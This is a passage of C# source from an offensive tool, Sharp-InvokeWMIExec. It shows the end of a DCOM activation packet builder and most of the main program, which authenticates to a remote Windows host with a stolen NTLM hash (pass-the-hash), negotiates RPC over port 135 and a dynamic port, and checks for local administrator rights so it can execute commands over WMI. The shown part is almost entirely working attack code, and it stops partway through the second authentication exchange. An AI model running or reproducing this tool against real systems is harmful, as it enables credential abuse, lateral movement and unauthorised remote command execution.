        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCLSID", new byte[] { 0x3b, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCBExtension", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFSize", new byte[] { 0x30, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoUnusedBuffer", new byte[] { 0x01, 0x00, 0x01, 0x00, 0x63, 0x2c, 0x80, 0x2a, 0xa5, 0xd2, 0xaf, 0xdd, 0x4d, 0xc4, 0xbb, 0x37, 0x4d, 0x37, 0x76, 0xd7, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 } },
        // Property 4: SecurityInfo — the only property that carries caller-supplied data (server name)
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoCommonHeader", typeHeader() },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoPrivateHeader", securityInfoPrivateHeader },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoAuthenticationFlags", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoNULLPtr", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNULLPtr", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved2", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameMaxCount", nameCount },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameOffset", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameActualCount", nameCount },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameString", targetUtf16 },
        // Property 5: LocationInfo
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoCommonHeader", typeHeader() },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoPrivateHeader", new byte[] { 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoNULLPtr", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoProcessID", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoApartmentID", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoContextID", new byte[4] },
        // Property 6: ScmRequestInfo (one protocol sequence, impersonation level 2)
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoCommonHeader", typeHeader() },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoPrivateHeader", new byte[] { 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoNULLPtr", new byte[4] },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestClientImpersonationLevel", new byte[] { 0x02, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestNumProtocolSequences", new byte[] { 0x01, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestUnknown", new byte[] { 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrMaxCount", new byte[] { 0x01, 0x00, 0x00, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrProtocolSeq", new byte[] { 0x07, 0x00 } },
        { "DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoUnusedBuffer", new byte[6] },
    };

    return request;
}
426 | }
427 | }
428 |
--------------------------------------------------------------------------------
/Sharp-InvokeWMIExec/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Threading;
4 | using System.Security.Cryptography;
5 | using System.Diagnostics;
6 | using System.Net.Sockets;
7 | using System.Collections.Specialized;
8 | using System.Linq;
9 | using System.Text;
10 |
11 | namespace Sharp_InvokeWMIExec
12 | {
13 | class Program
14 | {
15 | static void Main(string[] args)
16 | {
17 | ArgumentParserResult arguments = ArgParse.Parse(args);
18 |
19 | if (arguments.ParsedOk == false)
20 | {
21 | displayHelp("Error Parsing Arguments");
22 | Environment.Exit(0);
23 | }
24 |
25 | //User Params
26 | string command = "";
27 | string hash = "";
28 | string username = "";
29 | bool debugging = false;
30 | string domain = "";
31 | string target = "";
32 | bool show_help = false;
33 | bool AdminCheck = false;
34 |
35 | try
36 | {
37 | if (arguments.Arguments.ContainsKey("showhelp"))
38 | {
39 | displayHelp("Usage:");
40 | Environment.Exit(0);
41 | }
42 | if (arguments.Arguments.ContainsKey("command"))
43 | {
44 | command = arguments.Arguments["command"];
45 | }
46 | else
47 | {
48 | AdminCheck = true;
49 | }
50 | if (arguments.Arguments.ContainsKey("admincheck"))
51 | {
52 | AdminCheck = true;
53 | }
54 | if (arguments.Arguments.ContainsKey("hash"))
55 | {
56 | hash = arguments.Arguments["hash"];
57 | }
58 | if (arguments.Arguments.ContainsKey("username"))
59 | {
60 | username = arguments.Arguments["username"];
61 | }
62 | if (arguments.Arguments.ContainsKey("debugging"))
63 | {
64 | debugging = true;
65 | }
66 | if (arguments.Arguments.ContainsKey("domain"))
67 | {
68 | domain = arguments.Arguments["domain"];
69 | }
70 | if (arguments.Arguments.ContainsKey("target"))
71 | {
72 | target = arguments.Arguments["target"];
73 | }
74 | }
75 | catch
76 | {
77 | displayHelp("Error Parsing Arguments");
78 | Environment.Exit(0);
79 | }
80 |
81 | string Target_Short = String.Empty;
82 | string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-00-00", "").Replace("-", "");
83 | string Auth_Hostname = Environment.MachineName;
84 | string Output_Username = String.Empty;
85 | string WMI_Random_Port_String = null;
86 | string Target_Long = String.Empty;
87 | string WMI_Client_Stage = String.Empty;
88 | string WMI_Data = String.Empty;
89 | string OXID = String.Empty;
90 | StringBuilder output = new StringBuilder();
91 | int Request_Split_Stage = 0;
92 | int Request_Length = 0;
93 | int Sequence_Number_Counter = 0;
94 | int Request_Split_Index_Tracker = 0;
95 | int Request_Auth_Padding = 0;
96 | int OXID_Index = 0;
97 | int WMI_Random_Port_Int = 0;
98 | int Target_Process_ID = 0;
99 | bool success = false;
100 | IPAddress Target_Type = null;
101 | byte[] Assoc_Group = null;
102 | byte[] Object_UUID = null;
103 | byte[] IPID = null;
104 | byte[] WMI_Client_Send;
105 | byte[] Object_UUID2 = null;
106 | byte[] Sequence_Number = null;
107 | byte[] Request_Flags = null;
108 | byte[] Process_ID_Bytes = Utilities.ConvertStringToByteArray(processID);
109 | byte[] Request_Call_ID = null;
110 | byte[] Request_Opnum = null;
111 | byte[] Request_UUID = null;
112 | byte[] Request_Context_ID = null;
113 | byte[] Alter_Context_Call_ID = null;
114 | byte[] Alter_Context_Context_ID = null;
115 | byte[] Alter_Context_UUID = null;
116 | byte[] Hostname_Length = null;
117 | byte[] Stub_Data = null;
118 | byte[] WMI_Namespace_Length = null;
119 | byte[] WMI_Namespace_Unicode = null;
120 | byte[] IPID2 = null;
121 |
122 | if (show_help)
123 | {
124 | displayHelp(null);
125 | Environment.Exit(0);
126 | }
127 |
128 | if (string.IsNullOrEmpty(command))
129 | {
130 | AdminCheck = true;
131 | }
132 |
133 | if (!string.IsNullOrEmpty(hash) && !string.IsNullOrEmpty(username))
134 | {
135 | if (hash.Contains(":"))
136 | hash = hash.Split(':').Last();
137 | }
138 | else
139 | {
140 | displayHelp("Missing Required Params");
141 | Environment.Exit(0);
142 | }
143 |
144 |
145 | if (!string.IsNullOrEmpty(domain))
146 | Output_Username = domain + '\\' + username;
147 | else
148 | Output_Username = username;
149 |
150 | if (target == "localhost")
151 | {
152 | target = "127.0.0.1";
153 | Target_Long = "127.0.0.1";
154 | }
155 |
156 | try
157 | {
158 | if (debugging) { output.AppendLine(String.Format("Connecting to: {0}", target)); }
159 | Target_Type = IPAddress.Parse(target);
160 | Target_Short = Target_Long = target;
161 | }
162 | catch
163 | {
164 | Target_Long = target;
165 |
166 | if (target.Contains("."))
167 | {
168 | int Target_Short_index = target.IndexOf(".");
169 | Target_Short = target.Substring(0, Target_Short_index);
170 | }
171 | else
172 | {
173 | Target_Short = target;
174 | }
175 | }
176 |
177 | var WMI_Client = new TcpClient();
178 |
179 | try
180 | {
181 | WMI_Client.Connect(target, 135);
182 | }
183 | catch
184 | {
185 | Console.WriteLine("No Response from: " + target);
186 | Environment.Exit(0);
187 | }
188 |
189 | if (WMI_Client.Connected)
190 | {
191 | if (debugging) { output.AppendLine(String.Format("Connected to: {0}", target)); }
192 | NetworkStream WMI_Client_Stream = WMI_Client.GetStream();
193 | byte[] WMI_Client_Receive = new byte[2048];
194 | byte[] RPC_UUID = new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a };
195 | OrderedDictionary Packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x02 }, new byte[] { 0x00, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
196 | Packet_RPC["RPCBind_FragLength"] = new byte[] { 0x74, 0x00 };
197 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC));
198 | Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x05, 0x00 }, null);
199 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC));
200 | string WMI_HostName = BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 42, WMI_Client_Receive.Length));
201 | byte[] WMI_Hostname_Bytes = Utilities.ConvertStringToByteArray(WMI_HostName.Substring(0, WMI_HostName.IndexOf("-00-00-00")).Replace("-00", "").Replace("-", "").Replace(" ", ""));
202 | WMI_Hostname_Bytes = Utilities.GetByteRange(WMI_Hostname_Bytes, 0, WMI_Hostname_Bytes.Length);
203 | WMI_HostName = Encoding.ASCII.GetString(WMI_Hostname_Bytes);
204 | if (Target_Short != WMI_HostName)
205 | {
206 | if (debugging) { output.AppendLine(String.Format("Switching target name to {0} due to initial response.", WMI_HostName)); }
207 | Target_Short = WMI_HostName;
208 | }
209 | WMI_Client.Close();
210 | WMI_Client_Stream.Close();
211 | WMI_Client = new TcpClient();
212 | WMI_Client.ReceiveTimeout = 30000;
213 |
214 | try
215 | {
216 | WMI_Client.Connect(Target_Long, 135);
217 | }
218 | catch
219 | {
220 | output.AppendLine(String.Format("No response from {0}", target));
221 | Console.WriteLine(output.ToString());
222 | }
223 |
224 | if (WMI_Client.Connected)
225 | {
226 | if (debugging) { output.AppendLine(String.Format("ReConnected to: {0} ", target)); }
227 | if (debugging) { output.AppendLine("Authenticating"); }
228 | WMI_Client_Stream = WMI_Client.GetStream();
229 | RPC_UUID = new byte[] { 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 };
230 | Packet_RPC = WMIExec.RPCBind(3, new byte[] { 0xd0, 0x16 }, new byte[] { 0x01 }, new byte[] { 0x01, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
231 | Packet_RPC["RPCBind_FragLength"] = new byte[] { 0x78, 0x00 };
232 | Packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
233 | Packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x07, 0x82, 0x08, 0xa2 };
234 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC));
235 | string WMI_NTLMSSP = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
236 | int WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000");
237 | int WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2;
238 | int WMI_Domain_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_Client_Receive);
239 | int WMI_target_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_Client_Receive);
240 | byte[] WMI_NTLM_Challenge = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
241 | byte[] WMI_Target_Details = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 56 + WMI_Domain_Length, WMI_NTLMSSP_bytes_index + 55 + WMI_Domain_Length + WMI_target_Length);
242 | byte[] WMI_Target_Time_Bytes = Utilities.GetByteRange(WMI_Target_Details, WMI_Target_Details.Length - 12, WMI_Target_Details.Length - 5);
243 | StringBuilder sb = new StringBuilder();
244 | for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); };
245 | byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
246 | byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
247 | byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
248 | byte[] Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
249 | byte[] Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
250 | Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
251 | byte[] Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
252 | Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
253 | byte[] Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
254 | Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
255 | byte[] Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
256 | byte[] Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
257 | byte[] Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
258 | byte[] Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
259 | byte[] Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
260 | HMACMD5 HMAC_MD5 = new HMACMD5();
261 | HMAC_MD5.Key = NTLM_hash_bytes;
262 | string Username_And_Target = username.ToUpper();
263 | byte[] Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
264 | byte[] Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray();
265 | byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
266 | Random r = new Random();
267 | byte[] Client_Challenge_Bytes = new byte[8];
268 | r.NextBytes(Client_Challenge_Bytes);
269 | byte[] Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
270 | .Concat(WMI_Target_Time_Bytes)
271 | .Concat(Client_Challenge_Bytes)
272 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
273 | .Concat(WMI_Target_Details)
274 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
275 |
276 | byte[] Server_Challenge_And_Security_Blob_Bytes = WMI_NTLM_Challenge.Concat(Security_Blob_Bytes).ToArray();
277 | HMAC_MD5.Key = NTLMv2_hash;
278 | byte[] NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
279 | byte[] Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
280 | NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
281 | byte[] NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
282 | NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
283 | byte[] WMI_Session_Key_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
284 | byte[] WMI_Session_Key_Length = new byte[] { 0x00, 0x00 };
285 | byte[] WMI_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
286 |
287 | byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
288 | .Concat(Auth_LM_Offset)
289 | .Concat(NTLMv2_Response_Length)
290 | .Concat(NTLMv2_Response_Length)
291 | .Concat(Auth_NTLM_Offset)
292 | .Concat(Auth_Domain_Length)
293 | .Concat(Auth_Domain_Length)
294 | .Concat(Auth_Domain_offset)
295 | .Concat(Auth_Username_Length)
296 | .Concat(Auth_Username_Length)
297 | .Concat(Auth_Username_Offset)
298 | .Concat(Auth_Hostname_Length)
299 | .Concat(Auth_Hostname_Length)
300 | .Concat(Auth_Hostname_Offset)
301 | .Concat(WMI_Session_Key_Length)
302 | .Concat(WMI_Session_Key_Length)
303 | .Concat(WMI_Session_Key_Offset)
304 | .Concat(WMI_Negotiate_Flags)
305 | .Concat(Auth_Domain_Bytes)
306 | .Concat(Auth_Username_Bytes)
307 | .Concat(Auth_Hostname_Bytes)
308 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
309 | .Concat(NTLMv2_Response).ToArray();
310 |
311 | Packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
312 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
313 | WMI_Client_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length);
314 | WMI_Client_Stream.Flush();
315 | byte[] Causality_ID_Bytes = new byte[16];
316 | r.NextBytes(Causality_ID_Bytes);
317 | OrderedDictionary Packet_DCOM_Remote_Create_Instance = WMIExec.DCOMRemoteCreateInstance(Causality_ID_Bytes, Target_Short);
318 | byte[] DCOM_Remote_Create_Instance = Utilities.ConvertFromPacketOrderedDictionary(Packet_DCOM_Remote_Create_Instance);
319 | Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, DCOM_Remote_Create_Instance.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x01, 0x00 }, new byte[] { 0x04, 0x00 }, null);
320 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC).Concat(DCOM_Remote_Create_Instance).ToArray();
321 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, WMI_Client_Send);
322 | TcpClient WMI_Client_Random_Port = new TcpClient();
323 | WMI_Client_Random_Port.Client.ReceiveTimeout = 30000;
324 |
325 | int OXID_Bytes_Index;
326 | if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) == "05-00-00-00")
327 | {
328 | output.AppendLine("WMI Access Denied");
329 | Console.WriteLine(output.ToString());
330 | Environment.Exit(0);
331 | }
332 | else if (WMI_Client_Receive[2] == 3)
333 | {
334 | string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] });
335 | string[] Error_Code_Array = Error_Code.Split('-');
336 | Error_Code = string.Join("", Error_Code_Array);
337 | output.AppendLine(String.Format("Error Code: 0x{0}", Error_Code.ToString()));
338 | Console.WriteLine(output.ToString());
339 | Environment.Exit(0);
340 | }
341 | else if (WMI_Client_Receive[2] == 2 && AdminCheck)
342 | {
343 | output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target_Long));
344 | if (debugging) { output.AppendLine("Exiting due to AdminCheck being set"); }
345 | Console.WriteLine(output.ToString());
346 | Environment.Exit(0);
347 | }
348 | else if (WMI_Client_Receive[2] == 2 && !AdminCheck)
349 | {
350 | if (debugging) { output.AppendLine("Continuing since AdminCheck is false"); }
351 | if (Target_Short == "127.0.0.1")
352 | {
353 | Target_Short = Auth_Hostname;
354 | }
355 | byte[] Target_Unicode = (new byte[] { 0x07, 0x00 }).Concat(Encoding.Unicode.GetBytes(Target_Short + "[")).ToArray();
356 | string Target_Search = BitConverter.ToString(Target_Unicode).Replace("-", "");
357 | string WMI_message = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
358 | int Target_Index = WMI_message.IndexOf(Target_Search);
359 |
360 | if (Target_Index < 1)
361 | {
362 | IPAddress[] Target_Address_List = Dns.GetHostEntry(Target_Long).AddressList;
363 | foreach (IPAddress ip in Target_Address_List)
364 | {
365 | Target_Short = ip.Address.ToString();
366 | Target_Search = BitConverter.ToString(Target_Unicode).Replace("-", "");
367 | Target_Index = WMI_message.IndexOf(Target_Search);
368 |
369 | if (Target_Index >= 0)
370 | {
371 | break;
372 | }
373 | }
374 | }
375 |
376 | if (Target_Index > 0)
377 | {
378 | int Target_Bytes_Index = Target_Index / 2;
379 | byte[] WMI_Random_Port_Bytes = Utilities.GetByteRange(WMI_Client_Receive, Target_Bytes_Index + Target_Unicode.Length, Target_Bytes_Index + Target_Unicode.Length + 8);
380 | WMI_Random_Port_String = BitConverter.ToString(WMI_Random_Port_Bytes);
381 | int WMI_Random_Port_End_Index = WMI_Random_Port_String.IndexOf("-5D");
382 | if (WMI_Random_Port_End_Index > 0)
383 | {
384 | WMI_Random_Port_String = WMI_Random_Port_String.Substring(0, WMI_Random_Port_End_Index);
385 | }
386 | WMI_Random_Port_String = WMI_Random_Port_String.Replace("-00", "").Replace("-", "");
387 | char[] Random_Port_Char_Array = WMI_Random_Port_String.ToCharArray();
388 | char[] chars = new char[] { Random_Port_Char_Array[1], Random_Port_Char_Array[3], Random_Port_Char_Array[5], Random_Port_Char_Array[7], Random_Port_Char_Array[9] };
389 | WMI_Random_Port_Int = int.Parse(new string(chars));
390 | string Reverse = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
391 | int Reverse_Index = Reverse.IndexOf("4D454F570100000018AD09F36AD8D011A07500C04FB68820");
392 | int Reverse_Bytes_Index = Reverse_Index / 2;
393 | byte[] OXID_bytes = Utilities.GetByteRange(WMI_Client_Receive, Reverse_Bytes_Index + 32, Reverse_Bytes_Index + 39);
394 | IPID = Utilities.GetByteRange(WMI_Client_Receive, Reverse_Bytes_Index + 48, Reverse_Bytes_Index + 63);
395 | OXID = BitConverter.ToString(OXID_bytes).Replace("-", "");
396 | OXID_Index = Reverse.IndexOf(OXID, Reverse_Index + 100);
397 | OXID_Bytes_Index = OXID_Index / 2;
398 | Object_UUID = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 12, OXID_Bytes_Index + 27);
399 | }
400 | if (WMI_Random_Port_Int != 0)
401 | {
402 | try
403 | {
404 | WMI_Client_Random_Port.Connect(Target_Long, WMI_Random_Port_Int);
405 | }
406 | catch
407 | {
408 | output.AppendLine(String.Format("{0}:{1} did not respond", Target_Long, WMI_Random_Port_Int));
409 | Console.WriteLine(output.ToString());
410 | Environment.Exit(0);
411 | }
412 | }
413 | else
414 | {
415 | output.AppendLine(String.Format("Random port extraction failure"));
416 | Console.WriteLine(output.ToString());
417 | Environment.Exit(0);
418 | }
419 | }
420 | else
421 | {
422 | output.AppendLine("An Unkonwn Error Occured");
423 | Console.WriteLine(output.ToString());
424 | Environment.Exit(0);
425 | }
426 |
427 | if (WMI_Client_Random_Port.Connected)
428 | {
429 | if (debugging) { output.AppendLine(String.Format("Connected to: {0} using port {1}", Target_Long, WMI_Random_Port_Int)); }
430 | NetworkStream WMI_Client_Random_Port_Stream = WMI_Client_Random_Port.GetStream();
431 | Packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x03 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }, new byte[] { 0x00, 0x00 });
432 | Packet_RPC["RPCBind_FragLength"] = new byte[] { 0xd0, 0x00 };
433 | Packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
434 | Packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x97, 0x82, 0x08, 0xa2 };
435 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
436 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send);
437 | Assoc_Group = Utilities.GetByteRange(WMI_Client_Receive, 20, 23);
438 | WMI_NTLMSSP = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
439 | WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000");
440 | WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2;
441 | WMI_Domain_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_Client_Receive);
442 | WMI_target_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_Client_Receive);
443 | WMI_NTLM_Challenge = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
444 | WMI_Target_Details = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 56 + WMI_Domain_Length, WMI_NTLMSSP_bytes_index + 55 + WMI_Domain_Length + WMI_target_Length);
445 | WMI_Target_Time_Bytes = Utilities.GetByteRange(WMI_Target_Details, WMI_Target_Details.Length - 12, WMI_Target_Details.Length - 5);
446 | sb = new StringBuilder();
447 | for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); };
448 | NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
449 | Auth_Hostname = Environment.MachineName;
450 | Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
451 | Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
